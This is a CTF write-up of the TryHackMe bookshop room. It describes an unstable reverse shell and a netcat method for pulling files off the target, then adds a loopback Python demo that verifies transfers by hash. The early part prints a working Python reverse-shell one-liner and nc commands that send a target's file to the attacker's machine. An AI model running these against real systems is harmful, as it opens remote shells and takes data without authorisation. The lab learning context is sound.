Rev-shell & Netcat file transfer

Recently I was completing the TryHackMe bookshop CTF room and found myself on a very unstable reverse-shell. I couldn’t even stabilise the shell and every time I tried, I ended up hosing the one connection I had. This then required a reset of the target.

When successfully connected, I needed to grab a file from the target machine, but only had limited selection of commands available.

Even fewer commands allowed me to continue using the connection after running them.

I had already tunneled in by executing a Python one-liner on the vulnerable front end (it had a Python CLI):

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{ip}",{port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])

This connected to my local waiting nc listener:

nc -lnvp {port}

This gave me the reverse-shell. Unfortunately no matter what I tried, I could not stabilise it, so I had to run with a very flaky connection.

Update – after some research I found a better way to stabilise a reverse shell.

Netcat file transfer

This simple and rather accessible technique was grabbed from the folks over on ironhackers.

Once I was connected, I created a second local nc listener on a second port.

nc -lnvp {port2} > {destinationFilename}

In the reverse shell, I then commanded netcat to stream the file over to my local machine:

nc {local IP} {port2} -w 3 < {sourceFilename}

And that was it. This transferred the file over with no issue.

A quick and easy way to transfer files to/from machines when SSH / SCP / HTTP / FTP etc. are all locked down.
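The two nc commands above are just "accept a connection and write everything to a file" on one side and "connect, stream the file, close" on the other. Netcat gives no confirmation that the whole file arrived: if the -w timeout fires or the flaky shell drops mid-transfer, the listener simply writes a truncated file and exits cleanly. The example below (added here, not code from the original post or from ironhackers) reproduces the same two roles in Python over loopback and shows the check a practitioner should run afterwards, which is comparing a hash of the source and destination files; it also simulates a cut-off transfer to show that only the hash reveals it. All file names and contents are constructed for the demo.

```python
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    """Hash a file in chunks; the same result you would get from `sha256sum`."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_file(listening_socket, dest_path):
    """Listener side, equivalent to: nc -lnvp {port2} > {destinationFilename}.
    Accepts one connection and writes every byte received until EOF."""
    conn, _ = listening_socket.accept()
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # peer closed its write side: EOF
                break
            out.write(chunk)
    listening_socket.close()


def send_file(host, port, src_path, timeout=3.0, max_bytes=None):
    """Sender side, equivalent to: nc {local IP} {port2} -w 3 < {sourceFilename}.
    max_bytes (demo-only) stops early to simulate a transfer that was cut off."""
    with socket.create_connection((host, port), timeout=timeout) as s, \
            open(src_path, "rb") as f:
        data = f.read() if max_bytes is None else f.read(max_bytes)
        s.sendall(data)
        # Closing the write side is what lets the receiver see EOF and exit,
        # the role the -w timeout plays in the nc version.
        s.shutdown(socket.SHUT_WR)


def transfer_and_verify(src_path, dest_path, max_bytes=None):
    """Run listener and sender over loopback on an OS-chosen port, then compare
    hashes. Returns a dict so callers can see exactly what happened."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    listener = threading.Thread(target=receive_file, args=(srv, dest_path))
    listener.start()
    send_file("127.0.0.1", port, src_path, max_bytes=max_bytes)
    listener.join()

    src_hash, dst_hash = sha256_of(src_path), sha256_of(dest_path)
    return {
        "src_size": os.path.getsize(src_path),
        "dst_size": os.path.getsize(dest_path),
        "src_sha256": src_hash,
        "dst_sha256": dst_hash,
        "match": src_hash == dst_hash,
    }


SAMPLE = b"constructed sample payload\n" * 4000   # ~100 KB, constructed for the demo


def demo(cut_off=False):
    """Write a constructed file, transfer it, and report whether the copy is intact.
    With cut_off=True the sender stops after 1000 bytes, as a dropped shell would."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "loot.txt")
        dst = os.path.join(d, "received.txt")
        with open(src, "wb") as f:
            f.write(SAMPLE)
        return transfer_and_verify(src, dst, max_bytes=1000 if cut_off else None)


if __name__ == "__main__":
    print("intact transfer:", demo())
    print("cut-off transfer:", demo(cut_off=True))
```

On a real box the equivalent check is running sha256sum (or md5sum, whatever the limited shell offers) on the source file before sending and on the received file afterwards; a size match alone is not enough, since a partially written file can still look plausible.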
